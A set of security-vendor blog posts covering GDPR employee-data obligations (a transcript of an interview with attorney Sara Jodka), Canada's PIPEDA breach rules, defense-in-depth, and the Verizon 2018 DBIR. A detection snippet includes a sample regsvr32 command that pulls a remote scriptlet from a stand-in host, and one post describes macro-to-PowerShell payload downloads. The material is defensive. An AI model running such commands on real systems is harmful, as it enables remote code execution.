All posts by Andy Green

[Transcript] Attorney Sara Jodka on the GDPR and HR Data

In reviewing the transcript of my interview with Sara Jodka, I realize again how much great information she freely dispensed. Thanks Sara! The employee-employer relationship under the GDPR is a confusing area. It might be helpful to clarify a few points Sara made in our conversation about the legitimate interest exception to consent, and the threshold for Data Protection Impact Assessments (DPIAs).

The core problem is that to process personal data under the GDPR you need freely given consent. If you can’t get that, you have a few other options, which are covered in the GDPR’s Article 6. For employees, consent cannot be given freely, so employers will most likely need to rely on the “legitimate interest” exception referred to in that article.

There’s a little bit of paperwork required to prove that the employer’s interest overrides the employee’s rights. In addition, employers will have to notify employees as to what data is being processed. Sara refers to the ICO, the UK’s data protection authority, which has published informal guidance on the legitimate interest process that is worth reading.

Since the data collected by the employer is also from a vulnerable subject (the employee) and contains a special class of sensitive personal data (health, payroll, union membership, etc.), it meets the threshold set by GDPR regulators — see this guidance — for performing a DPIA. As we know, DPIAs require companies to conduct a formal risk analysis of their data and document it.

Sara reminds us that some US companies, particularly service-oriented firms, may be surprised to learn about the additional work they’ll need to undertake in order to comply with the GDPR. In short: employees, like consumers, are under the new EU law.


Inside Out Security: Sara Jodka is an attorney with Dickinson Wright in Columbus, Ohio. Her practice covers data privacy and cybersecurity issues. Sara has guided businesses through compliance matters involving HIPAA, Gramm-Leach-Bliley, FERPA, and COPPA, and most importantly for this podcast, certification under the US-EU Privacy Shield, which, of course, falls under the General Data Protection Regulation or GDPR.

A lot of abbreviations there! Welcome, Sara.

Sara Jodka: Thank you for having me.

IOS: I wanted to get into an article that you had posted on your law firm’s blog. It points out an interesting subcategory of GDPR personal data which doesn’t get a lot of attention, and that is employee HR records. You know, of course it’s going to include ethnic, payroll, 401(k), and other information.

So can you tell us, at a high level, how the GDPR treats employee data held by companies?

Employee Data Covered By the GDPR

SJ: Whenever we look at the GDPR, there are 99 articles, and they’re very broad. There’s not a lot of detail in the articles themselves. In fact, we only have one that actually carves employment data out, and that’s Article 88 — that’s the only one.

Whenever we’re looking at it, none of the articles say that all of these people have these rights. All these individuals have rights! None of them say, “Well, these don’t apply in an employment situation.” So we don’t have any exclusions!

We’re led to “Yes, they do apply.” And so we’ve been waiting on, and working with, the guidance that we’re receiving from the ICO with respect to the consent obligation, the notice obligation, and the portability requirements in the employee context. Because it is going to be a different type of relationship than the consumer relationship!

IOS: It’s kind of interesting that people, I think, or businesses, probably are not aware of this … except those who are in the HR business.

So I think there’s an interesting group of US companies that would find themselves under these GDPR rules that probably would not have initially thought they were in this category because they don’t collect consumer data. I’m thinking of law firms, investment banking, engineering, professional companies.

US Professional Service Companies Beware!

SJ: I think that’s a very good point! In fact, that’s where a lot of my work is actually coming from. A lot of the GDPR compliance is coming from EU firms that specialize with EU privacy. But a lot of U.S. companies didn’t realize that this is going to cover their employment aspects that they had with EU employees that are in the EU!

They thought, “Well, because we don’t actually have a physical location in the EU, it doesn’t actually cover us.” That’s not actually true at all.
The GDPR covers people that are working in the EU, people who reside in the EU, so to the extent that a U.S. company has employees that are working in the EU, it is going to cover that type of employee data. And there’s no exception in the GDPR around it. So it’s going to include those employees.

IOS: So I hadn’t even thought about that. So their records would be covered under the GDPR?

SJ: Yeah, the one thing about the definition of a data subject under the GDPR is it doesn’t identify that it has to be an EU resident or it has to be an EU citizen. It’s just someone in the EU.

When you’re there, you have these certain rights that are guaranteed. And that will cover employees that are working for U.S. companies but they’re working in the EU.

IOS: Right. And I’m thinking perhaps of a U.S. citizen who comes there for some assignment and, maybe working out of the office, would be covered under these rules.

SJ: And that’s definitely a possibility, and that’s one thing that we’ve been looking for. We’ve been looking for guidance from the ICO to determine the scope of what this is going to look like, not only in an employment situation, but when we’re dealing with an immigration situation, somebody on a work visa, and also in the context of schools, as we have different students coming over to the United States or going abroad. And what protection the GDPR then applies to those kinds of in-transition relationships, those employees or students.

With a lot of my clients, we are trying to err on the side of caution and so do things ahead of time, rather than beg forgiveness if the authorities come knocking at our door.

GDPR’s Legitimate Interest Exception is Tricky

IOS: I agree that’s probably a better policy, and that’s something we recommend in dealing with any of these compliance standards.

In that article, you mentioned that the processing of HR records has additional protections under the GDPR … An employee has to give explicit consent freely, and not as part of an employer-employee contract.

GDPR’s Article 6 says there are only six lawful ways to process data. If you don’t obtain freely given consent, then it gets tricky.

Can you explain this? And then, what does an employer have to do to process employee data  especially HR data?

SJ: Well, when we’re looking at the reasons that we’re allowed to process data, we can do it by consent, and we can also do it if we have a lawful basis.

A number of the lawful bases are going to apply in the employer context. One of those is if there is going to be an agreement. You know, in order to comply with the terms of a contract, like a collective bargaining agreement or like an employment agreement. So hire/fire payroll data would be covered under that, also if there is … a vital interest of an employee.

There’s speculation that that exception might actually be, or that legitimate basis might be used to obtain vital information regarding, like, emergency contact information of employees.

And one of the other lawful bases is if the employer has a legitimate interest in the data that isn’t outweighed by the rights of the data subject, the employee.

The issue, though, is that most of what we talk about is consumer data, and we’re looking a lot at consent and what consent actually looks like in terms of express consent, you know, having them check the box or whatever.

In an employee situation, the [UK’s] ICO has come out with guidance with respect to this. And they have expressly said that in an employee-employer relationship, there is an inherent imbalance of bargaining power, meaning an employee can never really consent to giving up their information because they have no bargaining power. They either turn it over, or they’re not employed. The employer is left to rely only on the other lawful bases to process data, excluding consent: the contract allowance and some of the others.

But the issue I have with that is, I don’t think that that’s going to cover all the data that we actually collect on an employee, especially employees who are operating outside the scope of a collective bargaining agreement.

In the context of, say, an at-will employee, where that contract exception doesn’t actually apply, I think there will be a lot of collection of data that doesn’t actually fall under that. It may fall into the legitimate interest, if the employer has the forethought to actually do what’s required, which is to document the process of weighing the employer’s interest against the interest of the employee, and making sure that that is a documented process. [Read the UK’s ICO guidelines on the process of working out legitimate interest.]

When employers claim a legitimate interest exception to getting employee consent, they have more work to do. [Source: UK ICO]

But what also comes with that is the notice requirement, and the notice requirement is not something that can be waived. So employers, if they are doing that (and this is basically going to cover every single employer), are going to have to give their employees notice of the data that they are collecting on them, at a minimum.

IOS: At a minimum. I think to summarize what you’re saying is it’s just so tricky or difficult to get what they call freely given consent, that most employers will rely on legitimate interest.

Triggers for Data Protection Impact Assessments (DPIAs)

IOS: In the second part of this interview, we joined Sara Jodka as she explains what triggers a data protection impact assessment, or DPIA when processing employee data.

SJ: I think that’s required when we’re dealing with requirements for sensitive data, and we’re talking about sensitive HR data. A DPIA has to be performed when two of the following exist; there are nine criteria, and any two of them are enough for a DPIA to have to be done. But you bring up a great point because the information that an employer is going to have is going to necessarily trigger the DPIA. [See these Working Party 29 guidelines for the nine criteria that Sara refers to]

The DPIA isn’t triggered by us relying on the legitimate basis and having to document that process. It’s actually triggered because we process sensitive data: their trade union affiliation, their religious data, their ethnicity. We have sensitive information, which is one of the nine things that can trigger it, and all you need is two to require a DPIA.

Another one that employers always get is they process data of a vulnerable data subject. A vulnerable data subject includes employees.

IOS: Okay. Right.

SJ:  I can’t imagine a situation where an employer wouldn’t have to do a DPIA. The DPIA is different than the legitimate interest outweighing [employee rights] documentation that has to be done. They’re two different things.


IOS: So, they will have to do the DPIAs? And what would that involve?

SJ: Well, it’s one thing that’s required for high-risk data processing, and that, as we just discussed, includes the data that the employer has.

Essentially, a DPIA is a process designed to describe the processing the employer does, and to assess its necessity and proportionality, to help manage the risks to the rights and freedoms of natural persons resulting from the processing of personal data, by assessing and determining the measures to address the data and the protections around it.

It’s a living document, so one thing to keep in mind about DPIAs is that they’re never done. They are going to be your corporation’s living document of the high-risk data you have and what’s happening with it, to help you create tools for accountability and to comply with the GDPR requirements, including, you know, notice to data subjects, their rights, and then enforcing those rights.

It’s basically a tracking document … of the data, where the data’s going, where the data lives, and what happens with the data and then what happens when somebody asks for their data, wants to erase their data, etc.

GDPR Surprises for US Companies

IOS: Obviously, these are very tricky things and you definitely need an attorney to help you with it. So, can you comment on any other surprises U.S. companies might be facing with GDPR?

SJ: I think one of the most interesting points, whenever I was doing my research, to really drill down, from my knowledge level, is you’re allowed to process data so long as it’s compliant with a law. You know, there’s a legal necessity to do it.

And a lot of employers, U.S. employers specifically, looked at this and thought, “Great, that legal requirement takes the load off of me because I need, you know, payroll records to comply with the Fair Labor Standards Act and, you know, state wage laws. I need my immigration information to comply with immigration requirements.”

You know, they were like, “We have all these U.S. laws for why we have to retain information and why we have to collect it.” Those laws don’t count, and I think that’s a big shock when I say, well, those laws don’t count.

We can’t rely on U.S. laws to process EU data!

We can only rely on EU laws and that’s one thing that’s brought up and kind of coincides with Article 88, which I think is an interesting thing.

If you look at Article 88, when they’re talking about employee data, what Article 88 does is actually allow member states to provide for more specific rules to ensure that the protections and the freedoms of their data subjects are protected.

These member states may be adding on more laws and more rights than the GDPR already provides! So not only do we have to comply with an EU law, but we are also going to have to comply with member states’ other specific laws that may be narrower than the GDPR.

Employers can’t just look at the GDPR; they’re also going to have to look at where a specific person is, whether it’s Germany or Poland. They’re going to have to look and see what aspects of the GDPR apply there, and then what additional, more specific laws that member state may have also put into effect.

Interviewer: Right!

SJ: So, I think that there are two big legal issues hanging out there that U.S. multinational companies…

IOS: One thing that comes to my mind is that there are fines involved for not complying with this. And that includes, of course, doing these DPIAs.

SJ: The fines are significant. I think the easiest way to put it is that the fines are astronomical. I mean, they’re not fines that we’re used to seeing. There are two levels of fines depending on the violation, and they can be up to 4% of a company’s annual global turnover, or 20 million euros, whichever is greater. If you look at it in U.S. dollar terms, you’re looking at, like, $23 million at this point.
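The two-tier cap Sara describes reduces to simple arithmetic. Here’s a minimal sketch of the upper tier (the function name is my own; the 4% / EUR 20 million “whichever is greater” rule comes from the GDPR’s Article 83(5)):

```python
def gdpr_max_fine(annual_global_turnover_eur: float) -> float:
    """Upper-tier GDPR fine cap (Article 83(5)): the greater of
    EUR 20 million or 4% of annual global turnover."""
    return max(20_000_000.0, 0.04 * annual_global_turnover_eur)

# A firm with EUR 1B turnover is exposed up to 4% = EUR 40M;
# a smaller firm still faces the EUR 20M floor.
print(gdpr_max_fine(1_000_000_000))  # 40000000.0
print(gdpr_max_fine(100_000_000))    # 20000000.0
```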

For some companies that could be a game changer; that’s a company shut down. Some companies can withstand that, but some can’t. And I think any time you’re facing a $23 million penalty, the cost of compliance is probably going to be far less than the potential penalty.

Especially because these aren’t necessarily one-time penalties, and there’s nothing that’s going to stop the Data Protection Authority from coming back and reviewing again, and assessing another penalty if you aren’t in compliance and you’ve already been fined once.

I think the issue is going to be how far the reach is going to be for U.S. companies. I think for U.S. companies that have, you know, brick-and-mortar operations in a specific member state, enforcement is going to be a lot easier for the DPA.

There’s going to be a greater barrier to enforcement for, you know, U.S. companies that only operate on U.S. soil.

Now, if they have employees that are located in the EU, I think that enforcement is going to be a little bit easier, but if they don’t and they’re merely just, you know, attracting business via their website or whatever to EU, I think enforcement is gonna be a little bit more difficult, so it’s going to be interesting to see how enforcement actually plays out.

IOS: Yeah, I think you’re referring to the territorial scope aspects of the GDPR. Which, yeah, I agree that’s kind of interesting.

SJ: I guess my parting advice is that this isn’t something that’s easy; it’s something you do need to speak to an attorney about. If you think that it may cover you at all, it’s at least worth a conversation. And I’ve had a lot of those conversations that have lasted, you know, a half an hour, and we’ve been very easily able to determine that the GDPR is not going to cover the U.S. entity.

And we don’t have to worry about it. And for some, we’ve been able to identify that the GDPR is going to touch them very slightly, and we’re taking steps, you know, with the website and with on-site hard copy documents to make sure that proper consent and notice is given in those documents.

So, sometimes it’s not going to be the earth-shattering compliance overhaul of a corporation that you think the GDPR may entail, but it’s worth a call with a GDPR attorney to at least find out so that you can sleep better at night, because this is a significant regulation, it’s a significant piece of law, and it is going to touch a lot of U.S. operations.

IOS: Right. Well, I want to thank you for talking about this somewhat overlooked area of the GDPR.

SJ: Thank you for having me.

Adventures in Malware-Free Hacking: Closing Thoughts

I think we can all agree that hackers have a lot of tricks and techniques to sneakily enter your IT infrastructure and remain undetected while they steal the digital goodies. The key takeaway from this series is that signature-based detection of malware is easily nullified by even low-tech approaches, some of which I presented.

I’m very aware that prominent security researchers are now calling virus scanners useless, but don’t throw them out just yet! There’s still a lot of mint-condition legacy malware on the Intertoobz used by lazy hackers that would be blocked by these scanners.

A better philosophy in dealing with file-less malware and stealthy post-exploitation techniques is to supplement standard perimeter defenses, port scanners, and malware detectors with secondary lines of defense, and have strategies in place when the inevitable happens — including a breach response program.

I’m referring to, wait for it, defense-in-depth (DiD). This is a very practical approach to dealing with smart hackers who sneer at perimeter defenses, and mock signature scanning software.

Does DiD have its own problems? Sure. Those same security pros who have lost faith in traditional security measures are now promoting whitelisting of applications, which can be a very strong inner wall to protect against an initial breach.

But the code-free techniques I showed in this series can be used to even get around whitelisting. This falls under a new hacking trend called “living off the land”, which subverts legitimate tools and software for evil purposes. In the next few weeks, I’ll post a mini-tutorial on lol-ware. For those who want to do their homework ahead of time, start perusing this interesting github resource. Stay tuned.

Q: Can you get around Windows security protections by sneaking forbidden commands into regsvr32.exe? A: Yes, next question.
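To make that answer a bit more concrete, here’s a toy heuristic, in Python, for spotting the well-known regsvr32 abuse pattern (invoking it with an /i: argument that points at a remote scriptlet) in process command-line logs. This is a sketch, not a production detection rule; the sample command lines are illustrative:

```python
import re

# Heuristic for the "remote scriptlet via regsvr32" trick: flag any
# command line that runs regsvr32 with an /i: (or -i:) argument whose
# value is an http(s) URL. A toy log-line check, not a real EDR rule.
SUSPICIOUS = re.compile(
    r"regsvr32(\.exe)?\b.*(/|-)i:\s*https?://", re.IGNORECASE)

def looks_like_regsvr32_abuse(cmdline: str) -> bool:
    return bool(SUSPICIOUS.search(cmdline))

print(looks_like_regsvr32_abuse(
    "regsvr32 /s /n /u /i:http://evil.example/file.sct scrobj.dll"))  # True
print(looks_like_regsvr32_abuse(
    "regsvr32 /s C:\\Windows\\System32\\msxml3.dll"))  # False
```

A real detection would look at parent-child process relationships and network activity as well, but even this crude string match catches the textbook form of the trick.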

Get Real About Data Security!

In my view, defense-in-depth is about minimizing liabilities: taking what could be a potential catastrophe and transforming it into something that’s not too terrible and doesn’t cost too much.

The hacker got in, but because of your company’s excellent and restrictive permission policies, you prevented her from gaining access to sensitive data.

Or the hackers have obtained access to the sensitive data, but your awesome user-behavior analytics technology has spotted the intruders and disabled the accounts before a million credit cards could be exfiltrated.

Or perhaps the hacker has managed to find and exfiltrate a file of email addresses. However, your outstanding breach response program, which includes having near real-time information on abnormal file activities, enables you to contact the appropriate regulators (and customers affected) in near record time with detailed information on the incident, thereby letting you avoid fines and bad publicity.

Common Sense Defense Advice

Defense-in-depth is more of a mindset and philosophy, but there are some practical steps to take and, ahem, great solutions available to make it easier to implement.

If I had to take the defense-in-depth approach and turn it into three actionable bullet points, here’s what I would say:

  • Assess. Evaluate your data risks by taking an inventory of what you need to protect. Identify PII and other sensitive data, some of which may fall under regulations, and which is often scattered across huge file systems. You need to work out who has access to it and who really should have access to it. Warning: this ain’t easy to do unless you have some help.
  • Defend. Now that you’ve found the data, limit the potential damage of future breaches by locking it down: reduce broad and global access, and simplify permission structures – avoid one-off ACLs and use group objects. Minimize the overall potential risk by retiring stale data or other data that no longer serves its original function.
  • Sustain. Maintain a secure state by automating authorization workflows, entitlement reviews, and the retention and disposition of data. And finally, monitor for unusual user and system behaviors.
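As a taste of what the “Assess” step looks like in practice, here’s a minimal Python sketch for a POSIX file system: walk a directory tree and flag files that any local user can read, a rough stand-in for “global access” in a real permissions audit (a real one would also inspect ACLs, group membership, and share permissions):

```python
import os
import stat

def world_readable_files(root: str):
    """Walk a directory tree and return files whose 'other' read
    bit is set, i.e., readable by any user on the machine."""
    flagged = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.stat(path).st_mode
            except OSError:
                continue  # file vanished or is unreadable mid-walk
            if mode & stat.S_IROTH:  # 'other' read permission
                flagged.append(path)
    return flagged
```

Pointing this at a share full of HR spreadsheets is a quick way to see how far your “global access” problem really extends before you start the Defend step.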

Need to make your defense in depth dream a reality? Learn how we can help.

[Podcast] Attorney Sara Jodka on the GDPR and HR Data, Part II

In the second part of my interview with Dickinson Wright’s Sara Jodka, we go deeper into some of the consequences of holding internal employee data. Under the GDPR, companies will likely have to take an additional step before they can process this data: employers will have to perform a Data Protection Impact Assessment (DPIA).

As Sara explained in the first podcast, internal employee data is covered by the GDPR — all of the new law’s requirements still apply. This means conducting a DPIA when dealing with certain classes of data, which as we’ll learn in the podcast, includes HR data. DPIAs involve analyzing the data that’s being processed, assessing the risks involved, and putting in place the security measures to protect the data.

Last April, the EU regulators released guidance on the DPIA, covering more of the details of what triggers this extra work. Legal wonks can review and learn about the nine criteria related to launching a DPIA. Because HR data processing touches on two of the triggers — vulnerable subjects (employees) and sensitive data (HR) — it crosses the threshold set by the regulators.
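The two-of-nine threshold is easy to express as a rule of thumb. In the sketch below, the criterion names are my paraphrase of the WP29 guidance; the counting logic is the point:

```python
# Paraphrased names for the nine WP29 DPIA criteria; meeting two or
# more of them means a DPIA is expected (per the guidance's rule of thumb).
DPIA_CRITERIA = {
    "evaluation_or_scoring",
    "automated_decision_with_legal_effect",
    "systematic_monitoring",
    "sensitive_data",
    "large_scale_processing",
    "matching_or_combining_datasets",
    "vulnerable_data_subjects",
    "innovative_use_of_technology",
    "prevents_exercise_of_rights",
}

def dpia_likely_required(criteria_met: set) -> bool:
    """True when the processing hits at least two of the nine criteria."""
    return len(criteria_met & DPIA_CRITERIA) >= 2

# HR data typically hits at least these two, which is why it
# crosses the threshold:
print(dpia_likely_required({"sensitive_data", "vulnerable_data_subjects"}))  # True
print(dpia_likely_required({"large_scale_processing"}))  # False
```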

Listen to Sara explain it all, and if you’re still not satisfied, have your in-house counsel review the regulator’s legalese contained in the EU guidance.


[Podcast] Attorney Sara Jodka on the GDPR and Employee HR Data, Part I

In this first part of my interview with Dickinson Wright attorney Sara Jodka, we start a discussion of how the EU General Data Protection Regulation (GDPR) treats employee data. Surprisingly, this turns out to be a tricky area of the new law. I can sum up my talk with her, which is based heavily on Jodka’s very readable legal article on this overlooked topic, as follows: darnit, employees are people too!

It may come as a surprise to some that the GDPR protects all “natural persons” in the EU. Employees, even those who aren’t EU citizens, are all completely natural, organic people under the GDPR. Their name, address, payroll, personal contacts, and in particular, sensitive ethnic or health data fall under the GDPR. So IT security groups will need to have all the standard GDPR security policies and procedures in place for employee data files — for example, minimize access to authorized users, set retention limits, and detect breaches.

The tricky part comes in getting “freely given” consent from employees. Listen to the podcast to learn how most EU employers will need to claim “legitimate interest” as a way to process employee data without explicit consent. This will lead to some additional administrative overhead for employers, who will have to prove their interests override the employees’ privacy and notify employees of what’s being done with the data.

As we’ll learn in the second part of the podcast, because employee data often contains sensitive data as well, employers will also have to conduct a Data Protection Impact Assessment (DPIA), which will require even more work.

Bottom line: US service-based companies in the EU — financial, legal, professional services — who thought they escaped from the GDPR’s reach because they didn’t collect consumer data are very much mistaken.

Sara explains it all.


Canada’s PIPEDA Breach Notification Regulations Are Finalized!

While the US — post-Target, post-Sony, post-OPM, post-Equifax — still doesn’t have a national data security law, things are different north of the border. Canada, like the rest of the world, has a broad consumer data security and privacy law, known as the Personal Information Protection and Electronic Documents Act (PIPEDA).

For nitpickers, there are also overriding data laws at the provincial level — Alberta and British Columbia’s PIPA — that effectively mirror PIPEDA.

Data Security and Privacy: It’s Better In Canada With PIPEDA

In any case, PIPEDA is a consumer-friendly law based on Canadian-born Privacy by Design (PbD) principles. The law has privacy rules requiring consumer consent when collecting personal information and giving consumers the right to access and correct their data. And companies are obligated to put in place security safeguards and practices, such as data minimization, to limit risks and protect their data. Not surprisingly, PIPEDA is also similar to another PbD-inspired law, the EU GDPR.

Like the GDPR, PIPEDA’s definition of personal information is quite broad: it includes any data about an individual. Along with name, and other obvious identifiers, PIPEDA counts as personal information employee files, credit records, medical records, blood type, social status, and more.

Breach reporting must-haves as spelled out in the new regulation.

In June 2015, the Digital Privacy Act amended PIPEDA to include breach notification requirements. The Act defines a “breach of security safeguards” as a loss or unauthorized access or disclosure of personal information resulting from a breach of the organization’s security safeguards.

Those of you who’ve been following along with our coverage of various breach notification laws know that the use of “or” above is significant. In short: a breach can involve unauthorized access alone without disclosure, and that means hacking into systems and touching personal information counts as a breach. And in particular, a ransomware attack would be considered a breach under PIPEDA.

Under PIPEDA, organizations are required to notify the Privacy Commissioner of Canada and affected individuals “as soon as feasible” when there is a breach that creates a “real risk of significant harm” — which can include mere reputational harm — to an individual. It also requires them to keep a record of each breach of safeguards involving personal information, regardless of whether the breach results in a risk of significant harm.

With the breach notification law passed, Canadians had to wait for the Canadian government to finalize the nitty gritty details in new regulations yet to be written, and to set a date for the rules to go into effect. And wait.

PIPEDA’s Breach Notification Rule Goes Into Effect (in November)

A mere three years later, the government finally released the fine print of the regulation in January. If you’re truly interested, you can read the details here (skip past all the regulations on fisheries to page 149).

I scanned this riveting legal prose, so I can save you some time. If, after analysis of an incident, it’s decided the breach will cause significant harm, the regulatory authority and the individuals affected will have to be notified with the breach details, including a description of the incident, the personal information accessed or taken, and what the company is doing about the breach (see the above legalese from the regulation).

But even if the risk to the affected individuals doesn’t merit a notification, the company still has to record basic information about the breach and retain it for 24 months.

These breach reporting rules will go into effect on November 1, 2018.

Varonis and PIPEDA

As with the GDPR and many other data security and privacy laws, Varonis can also help you comply with PIPEDA. You can learn more about how we support its key principles here.

For the new breach notification rules, our DatAlert product can monitor sensitive personal information and alert IT when this data is accessed, modified, or copied in an abnormal way. More specifically, our UBA threat models can catch ransomware as it accesses and encrypts files.
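To illustrate the general idea behind this kind of monitoring (this is not Varonis’s actual threat model, just a toy rate-based detector), a burst of file modifications from a single account inside a short window is the classic ransomware-encryption footprint:

```python
from collections import deque

class FileActivityMonitor:
    """Toy sliding-window detector: alert when one account generates
    more than max_events file-modify events within window_seconds."""

    def __init__(self, max_events: int = 100, window_seconds: float = 60.0):
        self.max_events = max_events
        self.window = window_seconds
        self.events = {}  # account -> deque of event timestamps

    def record(self, account: str, timestamp: float) -> bool:
        """Record one file-modify event; return True if it trips the alert."""
        q = self.events.setdefault(account, deque())
        q.append(timestamp)
        # Drop events that have aged out of the window.
        while q and timestamp - q[0] > self.window:
            q.popleft()
        return len(q) > self.max_events

mon = FileActivityMonitor(max_events=5, window_seconds=10.0)
alerts = [mon.record("svc_backup", float(t)) for t in range(8)]
print(alerts)  # [False, False, False, False, False, True, True, True]
```

A production system would baseline each account’s normal activity rather than use a fixed threshold, but the sliding-window idea is the same.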

Want to learn more about how Varonis helps with breach monitoring and reporting? Ask for a free demo today!




Another GDPR Gotcha: HR and Employee Data

Have I mentioned recently that if you’re following the usual data security standards (NIST, CIS Critical Security Controls, PCI DSS, ISO 27001) or common sense infosec principles (PbD), you shouldn’t have to expend much effort to comply with the General Data Protection Regulation (GDPR)? I still stand by this claim.

Sure there are some GDPR requirements, such as the 72-hour breach notification, which will require special technology sauce.

There’s also plenty of fine print that will keep CPOs, CISOs, and outside legal counsels busy for the next few years.

US Professional Service Companies Beware!

One of those fine points is how the GDPR deals with employee records. I’m talking about human resources’ employee files, which can cover, besides all the usual identifiers (name, address, and photos), personal details such as health, financial, employee reviews, family contact information, and more.

EU-based companies and US companies that have been doing business in the EU have long had to deal with Europe’s stricter national laws about employee data.

The GDPR holds a surprise for US companies that are not consumer-oriented and thought that the new law’s tighter security and privacy protections didn’t cover them. In fact, they do.

I’m referring particularly to US financial, legal, accounting, engineering, and other companies providing B2B services that are not in the business of collecting consumer data.

Let me just say it: the GDPR considers employee records to be personal data — that’s GDPR-ese for what we in the US call PII.  And companies that have personal data of employees – and who doesn’t – will have to comply with the GDPR even if they don’t have consumer data.

So if a US accounting firm in the EU has a data breach involving the theft of employee records, then it would have to notify the local supervisory authority within the 72-hour window.

There’s another surprise for US companies. Even if they don’t have a physical presence in the EU but still have employees there — say French or Italian workers are telecommuting — then their employee records would also be covered by the GDPR.

Employees Have Data Privacy Rights

And that also means, with some restrictions, that employees gain privacy rights over their data: they can request, just as consumers do, access to their personnel files, and have the right to correct errors.

There’s even an employee “right to be forgotten”, but only when the data is no longer necessary for the “purposes for which it was collected”. Obviously, employers have a wide claim to employee data, so it’s easy to see that most employee files are protected from being deleted on demand.

But no doubt there’ll be instances where the “right to be forgotten” rule makes sense. Perhaps a vice president of marketing makes a request to HR to take a one-month leave of absence to study bird life in Costa Rica, has second thoughts, and then asks HR to delete the initial application based on his GDPR rights.

More importantly, employees also have the right to consent to the processing of their data. This particular right is not nearly as straightforward as it is for consumers.

Since employee privacy rights under the GDPR are far from simple, law firms and attorneys are filling the Intertoobz with articles on this subject, especially on the consent to processing loopholes.

As it happens, I came across one written by Sara Jodka, an attorney for Columbus-based Dickinson Wright, that is mercifully clear and understandable by non-attorney life forms.

The DPIA Surprise

The key point that Jodka makes is that since employers have leverage over employees, it’s hard for the consent to processing to be “freely given”, which is what the GDPR requires.

Typically, an employee has given consent to the processing of her data as part of an employment contract. But since the employee likely had no choice but to sign the contract in order to get the job, the GDPR does not consider this freely given.

So how do employers deal with this?

There is an exception that the GDPR makes: if the employer has “legitimate interests”, then consent is not needed. To prove legitimate interest, the company will have to document why its right to the data outweighs the employee’s privacy rights. Essentially, in the one-sided employer-employee relationship, the employer has the burden of proving it needs the data, since consent generally can’t be freely given.

Though there are some differing legal opinions on the types of employee data covered by legitimate interests, sensitive data involved with monitoring of employee computer usage, their location, or perhaps even their travel plans will definitely require employers to take an extra step.

They will have to perform a Data Protection Impact Assessment or DPIA.

On the IOS blog, we’ve been writing about DPIAs for quite a while. They’re required for the processing of sensitive data, such as racial, ethnic, or health-related information. Employee records that contain this information, as well as monitoring data, will fall under the DPIA rule, which is spelled out in Article 35.

In short: companies using the legitimate interest exception for processing employee records will likely also be conducting data assessments that include analyzing the processing, evaluating the security risks involved, and proposing measures to protect the data.

If you’re finding this a little confusing, you are not alone. However, help is on the way!

I interviewed Sara Jodka earlier this week, and she brilliantly explained the subtleties involved in protecting employee records under the GDPR, and has some great advice for US companies.

Stay tuned. I’m hoping to get the first part of the podcast up next week.

Verizon 2018 DBIR: Phishing, Stolen Passwords, and Other Cheap Tricks


Like the rest of the IT security world last week, I had to stop everything I was doing to delve into the latest Verizon Data Breach Investigations Report. I spent some quality time with the 2018 DBIR (after drinking a few espressos), and I can sum it all up in one short paragraph.

Last year, companies faced financially driven hackers and insiders, who use malware, stolen credentials, or phishing as attack vectors. They get in quickly and then remove payment card information, PII, and other sensitive data. It often takes IT staff months to even discover there’s been a breach.

I just played a trick on you.

The above paragraph was taken word for word from my analysis of the 2016 DBIR. Depressingly, this same analysis applies to the 2018 DBIR and has been pretty spot on for the last few years of Verizon reports.

Swiss Cheese

The point is that hackers have found a very comfortable gig that’s hard to defend against. According to this year’s DBIR, stolen credentials and phishing take the first and third slots in the report’s table of top 20 actions in breaches. (RAM scrapers, by the way, are in the second position and used heavily in POS attacks.)

How big a problem are stolen credentials — user names and passwords previously hacked from other sites?

In a post late last year, Brian Krebs explored the dark market in hot passwords. A hacker can buy a vanilla user name and password combination for around $15. But the price goes up to $60 for active accounts of military personnel, and tops out at $150 for active credentials from an online electronics retailer.

Let’s face it: credentials are relatively inexpensive, and, as it turns out, they are also plentiful. A study by Google puts the number of credentials available on the black market at almost two billion.

Obviously, this is very bad news. Until we have wider use of multi-factor authentication, hackers can get around perimeter defenses to harvest even more credentials and other personal data and then sell them back into the black market. In other words, there’s an entire dark economy at work to make it all happen.

And if hackers don’t have the cash to buy credentials in bulk, they can use phishing techniques to get through the digital door. There is a small ray of hope about phishing: the DBIR says that 80% of employees never click. Of course, the bad news is that 20% will.

Dr. Zinaida Benenson, our go-to expert on phishing, reported a similar percentage of clickers in her phishing experiments (which we wrote about last year): anywhere between 20% and 50% clicked, depending on how the message was framed.

It only takes one employee to take the bait for the hackers to get in. You can run your own Probability-101 calculation, as I did here, to discover that with near certainty a good phish mail campaign will succeed in placing a malware payload on a computer.
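That back-of-the-envelope calculation is easy to sketch. Here’s a minimal illustration, using the DBIR’s 20% click rate as the assumed per-employee probability and treating clicks as independent (both simplifying assumptions):

```python
# Odds that a phishing campaign lands at least one click.
# Assumes a 20% per-employee click rate (per the DBIR) and independence.
def p_at_least_one_click(click_rate: float, employees: int) -> float:
    """Probability that at least one of `employees` targets clicks."""
    return 1 - (1 - click_rate) ** employees

# Even a modest campaign against 25 employees is close to a sure thing:
print(round(p_at_least_one_click(0.20, 25), 3))  # 0.996
```

At 100 targets, the probability is effectively 1 — which is why attackers can afford to be lazy.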

In short: standard perimeter security defenses protecting against phishing attacks or hackers using stolen or weak credentials begin to resemble a beloved dairy product from a mountainous European country.

Scripty Malware

According to the DBIR, phish mail is the primary way malware enters an organization: their stats say it carries the hackers’ evil software over 90% of the time. Hackers don’t have to waste time finding openings in websites using injection attacks or other techniques: phishing is very effective and easier to pull off.

This year’s DBIR also has some interesting insights (see below) into the format of the malware that eventually lands inside the organization. The hackers are using scriptware — either JavaScript or VBScript — far more than binaries.

Source: Verizon 2018 DBIR

And it makes sense! It’s incredibly simple to write these scripts — this non-technical blogger could do it — and make them appear as, say, clickable PDF files in the case of JS or VBS, or insert a VBA script directly into a Word or Excel doc that will execute on opening.

You can learn about these malware-free techniques by reading my epic series of posts on this topic.

The attackers can also cleverly leverage the built-in script environments found in Microsoft Office. There’s even a completely no-sweat code-free approach that takes advantage of Microsoft Word’s DDE function used in embedded fields — I wrote about it here.

Typically, this initial payload allows the hackers to get a foot in the door, and its evil purpose is to then download more sophisticated software. The malware-free series, by the way, has real-world samples that show how this is done. Feel free to study them.

To quickly summarize: the MS Office scriptware involves launching a PowerShell session and then using the WebClient command to download the next stage of the attack over an HTTP channel.

